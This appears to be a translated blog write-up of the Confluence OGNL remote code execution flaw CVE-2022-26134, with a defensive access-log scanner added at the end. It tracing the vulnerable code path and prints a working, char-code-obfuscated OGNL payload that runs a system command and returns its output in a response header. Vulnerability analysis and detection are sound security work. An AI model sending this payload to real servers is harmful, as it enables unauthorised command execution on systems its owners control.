CVE-2022-26134 Confluence Server Data Center OGNL RCE
2022-6-8 10:42:27 Author: y4er.com

The call to com.opensymphony.xwork.util.TextParseUtil#translateVariables was removed; following this function shows that it is the point where the OGNL expression is evaluated.

Execution then reaches com.atlassian.confluence.servlet.ConfluenceServletDispatcher#serviceAction; ConfluenceServletDispatcher is a subclass of ServletDispatcher.

In serviceAction, createActionProxy is called first to create a proxy object, and then the proxy object's execute function is called. Inside the proxy object, our payload is stored in the namespace field.

The proxy then passes itself (this) to interceptor.intercept(this); taking the com.opensymphony.xwork.interceptor.AroundInterceptor interceptor as an example, invocation.invoke() is still called.

The result class corresponding to notpermitted is com.opensymphony.xwork.ActionChainResult, so execution enters com.opensymphony.xwork.ActionChainResult#execute.

Starting with v7.15, Confluence added a sandbox configuration for OGNL expression parsing. When com.opensymphony.xwork.util.TextParseUtil#translateVariables invokes OGNL, it uses findValue:

${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("X-CMD",Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,105,100,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,115))"))}
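As an added defender-side example (not code from the original post): the post notes that the payload lands in the action proxy's namespace field, and xwork derives that namespace from the request path, so the `${...}` marker of an injected expression should be visible in the access log. This Python scanner decodes the request path of constructed combined-format log lines and flags any namespace segment containing an OGNL `${...}` expression; the log format, the sample lines and the namespace derivation rule (everything before the last `/`) are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not real traffic.
# Line 2 is percent-encoded, line 3 is raw; both carry a harmless ${...} probe.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jun/2022:10:42:27 +0800] "GET /pages/viewpage.action?pageId=1 HTTP/1.1" 200 512
10.0.0.9 - - [08/Jun/2022:10:42:31 +0800] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0
10.0.0.9 - - [08/Jun/2022:10:42:35 +0800] "GET /${7*7}/ HTTP/1.1" 302 0
10.0.0.7 - - [08/Jun/2022:10:42:40 +0800] "POST /rest/api/content HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# An OGNL/EL-style expression marker in the path.
OGNL_MARKER = re.compile(r'\$\{.*\}', re.DOTALL)


def decode_path(uri: str) -> str:
    """Drop the query string and percent-decode twice to catch double encoding."""
    path = uri.split("?", 1)[0]
    return unquote(unquote(path))


def namespace_of(path: str) -> str:
    """Assumed xwork rule: the action namespace is the path up to the last '/'."""
    return path.rsplit("/", 1)[0] if "/" in path else ""


def scan(log_text: str) -> list:
    """Return one record per request whose namespace segment carries ${...}."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than failing the scan
        ns = namespace_of(decode_path(m["uri"]))
        if OGNL_MARKER.search(ns):
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": m["status"], "namespace": ns})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```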

Source: https://y4er.com/posts/cve-2022-26134-confluence-server-data-center-ognl-rce/